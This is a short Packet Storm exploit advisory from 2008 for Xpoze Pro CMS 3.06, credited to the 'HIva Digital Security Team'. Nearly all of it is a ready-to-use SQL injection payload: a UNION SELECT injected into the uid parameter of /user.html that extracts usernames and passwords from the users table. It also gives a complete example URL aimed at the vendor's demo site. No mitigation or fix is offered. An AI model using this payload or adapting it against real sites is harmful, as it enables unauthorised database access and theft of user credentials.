xpozepro-sql.txt

2008-07-10T00:00:00
ID PACKETSTORM:68014
Type packetstorm
Reporter HIva Team
Modified 2008-07-10T00:00:00

Description

                                        
                                            `######################  
*^Hiva Digital Security Team^  
^HIva Team^  
######################  
*Script:  
Xpoze Pro CMS 2008  
XPOZE Pro 3.06 SQL Injection Exploit  
######################  
*Demo:  
http://demo.xpoze.org/  
######################  
*Authors:  
farenh3it, sn0wman  
######################  
*Exploit:  
  
/user.html?uid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(user,0x3a,pass),19,20,21,22,id,24,25,26,27,29,30,31,32,33+FROM+users+WHERE+id=1/*  
  
######################  
*for exam:   
http://demo.xpoze.org/user.html?uid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(user,0x3a,pass),19,20,21,22,id,24,25,26,27,29,30,31,32,33+FROM+users+WHERE+id=1/*  
######################  
*Thanks to str0ke :X  
`